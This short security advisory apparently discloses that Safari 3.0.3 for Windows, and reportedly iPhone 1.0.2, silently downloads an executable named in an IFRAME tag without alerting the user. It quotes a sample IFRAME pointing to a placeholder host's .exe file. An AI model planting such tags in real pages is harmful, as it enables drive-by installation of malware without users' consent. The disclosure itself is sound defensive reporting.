A full disclosure report from Insecure.org refers to a flaw in Safari 3.0.3 which allows local zones to access external domains. The Safari 3 Public Beta was released on June 11 for Mac OS X and Windows XP/Vista. This beta version is for trial purposes and intended to gather feedback prior to a full release.
True enough, we have found that the Safari version 3.0.3(522.15.5) Web browser for the Windows OS automatically downloads a file referred to in an IFRAME tag used on a certain site, for example,
iframe src=”http://www.XXXX.com/XXXX.exe” mce_src=”http://www.XXXX.com/XXXX.exe” name=”iframe” id=”iframe”
Unlike IE and Firefox, which displays an alert message like the one below whenever a file is about to be downloaded onto the system, this Safari version does not display any sort of notification.
A behind the scenes look using the Ethereal Network Analyzer further reveals that the system is indeed being commanded to download a file.
The flaw has potential for misuse and may become a possible source of violations of user rights against entities downloading files on a system without user consent. As of this writing, this bug has also been found to work on iPhone 1.0.2.
Additional information provided by Leander Yu.